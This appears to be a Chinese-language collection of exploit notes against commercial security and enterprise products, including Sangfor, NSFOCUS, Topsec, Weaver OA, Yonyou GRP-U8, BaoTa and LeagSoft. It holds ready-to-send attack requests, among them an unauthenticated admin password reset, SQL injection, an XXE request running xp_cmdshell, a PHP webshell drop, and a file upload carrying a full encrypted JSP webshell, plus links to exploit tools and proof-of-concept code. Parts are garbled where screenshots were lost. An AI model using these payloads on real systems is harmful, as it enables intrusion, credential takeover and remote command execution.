


深信服EDR 3.2.21 任意代码执行漏洞分析



官方已发布补丁，注意更新！
2


绿盟UTS综合威胁探针管理员任意登录
漏洞详情：
  绿盟全流量威胁分析解决方案针对原始流量进行采集和监控，对流量信息进行深度还原、存储、查询和分析，可以及时掌握重要信息系统相关网络安全威胁风险，及时检测漏洞、病毒木马、网络攻击情况，及时发现网络安全事件线索，及时通报预警重大网络安全威胁，调查、防范和打击网络攻击等恶意行为，保障重要信息系统的网络安全。
绿盟综合威胁探针设备版本V2.0R00F02SP02及之前存在此漏洞。
漏洞利用过程：



对响应包进行修改，将false更改为true的时候可以泄露管理用户的md5值密码




利用渠道的md5值去登录页面


 成功登录，登录后通过管理员权限对设备进行管控，并且可以看到大量的攻击信息，泄露内部网络地址包括资产管理。


处置意见:
建议尽快更新补丁至最新：http://update.nsfocus.com/update/listBsaUtsDetail/v/F02
3
齐治堡垒机前台远程命令执行漏洞
 

漏洞利用：
利用条件：无需登录：
第一http://10.20.10.11/listener/cluster_manage.php 返回“OK”。
第二，执行以下链接即可 getshell，执行成功后，生成 PHP 一句话马/var/www/shterm/resources/qrcode/lbj77.php 密码 10086，使用 BASE64 进行编码。这里假设 10.20.10.10 为堡垒机的 IP 地址。



特征：
漏洞利用点：


4
天融信数据防泄漏系统越权修改管理员密码
无需登录权限,由于修改密码处未校验原密码,且/?module=auth_user&action=mod_edit_pwd
接口未授权访问,造成直接修改任意用户密码。:默认superman账户uid为1。
POST /?module=auth_user&action=mod_edit_pwd 
Cookie: username=superman;

uid=1&pd=Newpasswd&mod_pwd=1&dlp_perm=1


天融信TopApp-LB 负载均衡系统Sql注入

POST /acc/clsf/report/datasource.php HTTP/1.1
Host:
Connection: close
Accept: text/javascript, text/html, application/xml, text/xml, */*
X-Prototype-Version: 1.6.0.3
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=ijqtopbcbmu8d70o5t3kmvgt57
Content-Type: application/x-www-form-urlencoded
Content-Length: 201t=l&e=0&s=t&l=1&vid=1+union 
select1,2,3,4,5,6,7,8,9,substr('a',1,1),11,12,13,14,15,16,17,18,19,20,21,22--+&gid=0&lmt=10&o=r_Speed&asc=false&p=8&lipf=&lipt=&ripf=&ript=&dscp=&proto=&lpf=&lpt=&rpf=&rpt=@
泛微OA云桥任意文件读取漏洞

 
  利用/wxjsapi/saveYZJFile接口获取filepath,返回数据包内出现了程序的绝对路径,攻击者可以通过返回内容识别程序运行路径从而下载数据库配置文件危害可见。




漏洞利用工具下载：链接：https://pan.baidu.com/s/1j5kugnCc1pq5IjjlFMnZLw#
提取码：52ss#
Exchange Server 远程代码执行漏洞

  CVE-2020-16875: Exchange Server 远程代码执行漏洞（202009月度漏洞）（POC未验证）
ps版POC：https://srcincite.io/pocs/cve-2020-16875.ps1.txt
py版POC：https://srcincite.io/pocs/cve-2020-16875.py.txt
6

宝塔中间件解析漏洞
1.环境搭建
Windows Server2012 R2 X64
宝塔Windows6.5.0版本
宝塔选择：MySQL+ PHP-5.4+IIS 8.5



源码使用公开的PHP上传源码:https://www.runoob.com/wp-content/uploads/2013/08/runoob-file-uplaod-demo.zip。
已做白名单限制，仅允许上传 .gif、.jpeg、.jpg、.png 文件，文件大小必须小于 200 kB



2.漏洞复现
配置好网站以后：



本地写一个
<?php
phpinfo();


另存为.jpg格式


直接上传文件，不需要做任何修改：




访问上传文件地址：



在upload/1.jpg后面加/.php


成功验证存在任意文件上传漏洞！

用友GRP-u8 注入
该系统被曝存在命令执行漏洞，当用户可以控制命令执行函数中的参数时，将可注入恶意系统命令到正常命令中，造成命令执行攻击，漏洞细节以及相关漏洞poc如下：
用友GRP-u8 XXE漏洞（XML External Entity-XML外部实体注入）：
POST /Proxy HTTP/1.1
Accept: Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0;)
Host: host
Content-Length: 357
Connection: Keep-Alive
Cache-Control: no-cache
cVer=9.8.0&dp=<?xml version="1.0"encoding="GB2312"?><R9PACKET version="1"><DATAFORMAT>XML</DATAFORMAT><R9FUNCTION><NAME>AS_DataRequest</NAME><PARAMS><PARAM><NAME>ProviderName</NAME><DATAformat="text">DataSetProviderData</DATA></PARAM><PARAM><NAME>Data</NAME><DATAformat="text">exec xp_cmdshell 'net user'</DATA></PARAM></PARAMS></R9FUNCTION></R9PACKET>
burp里面repeat即可：


2
WPS Office 图片解析错误导致堆损坏，任意代码执行
看上去(算了看不懂... ,漏洞利用可能导致拒绝服务。
相关参考:
http://zeifan.my/security/rce/heap/2020/09/03/wps-rce-heap.html

联软准入


OST /uai/download/uploadfileToPath.htm HTTP/1.1HOST: xxxxx -----------------------------570xxxxxxxxx6025274xxxxxxxx1Content-Disposition: form-data; name="input_localfile"; filename="xxx.jsp"Content-Type: image/png <%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if (request.getMethod().equals("POST")){String k="e45e329feb5d925b";/*该密钥为连接密码32位md5值的前16位，默认连接密码rebeyond*/session.putValue("u",k);Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec(k.getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);}%> -----------------------------570xxxxxxxxx6025274xxxxxxxx1Content-Disposition: form-data; name="uploadpath" ../webapps/notifymsg/devreport/-----------------------------570xxxxxxxxx6025274xxxxxxxx1--

